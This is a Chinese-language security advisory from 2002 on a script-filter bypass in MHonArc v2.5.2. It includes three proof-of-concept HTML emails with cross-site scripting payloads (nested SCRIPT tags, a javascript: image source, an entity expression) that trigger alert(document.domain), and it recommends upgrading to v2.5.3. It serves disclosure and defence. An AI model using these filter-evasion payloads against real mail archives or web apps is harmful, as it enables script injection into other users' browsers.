MHonArc v2.5.2脚本过滤可绕过漏洞发布时间:2002-04-20 更新时间:2002-04-20 严重程度:中 威胁程度:欺骗 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 MHonArc v2.5.2详细描述 MHonArc 是可以对HTML邮件进行脚本标记过滤的工具,其中存在漏洞可以导致脚本标识符不被检查。 测试代码 Exploit 1: ---------- From: test@example.com To: test@example.com Date: Sun, 16 Dec 2001 00:00:00 +0900 Subject: test MIME-Version: 1.0 Content-Type: text/html <HTML> <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT> </HTML> ---------- Exploit 2: ---------- From: test@example.com To: test@example.com Date: Sun, 16 Dec 2001 00:00:00 +0900 Subject: test MIME-Version: 1.0 Content-Type: text/html <HTML> <IMG SRC=javascript:alert(document.domain)> </HTML> ---------- Exploit 3: ---------- From: test@example.com To: test@example.com Date: Sun, 16 Dec 2001 00:00:00 +0900 Subject: test MIME-Version: 1.0 Content-Type: text/html <HTML> <B foo=&{alert(document.domain)};> Vulnerable only if Netscape 4.x is used to browse.</B> </HTML> ---------- 解决方案 升级程序如下: MHonArc v2.5.3 http://www.mhonarc.org/MHonArc/CHANGES 相关信息 |
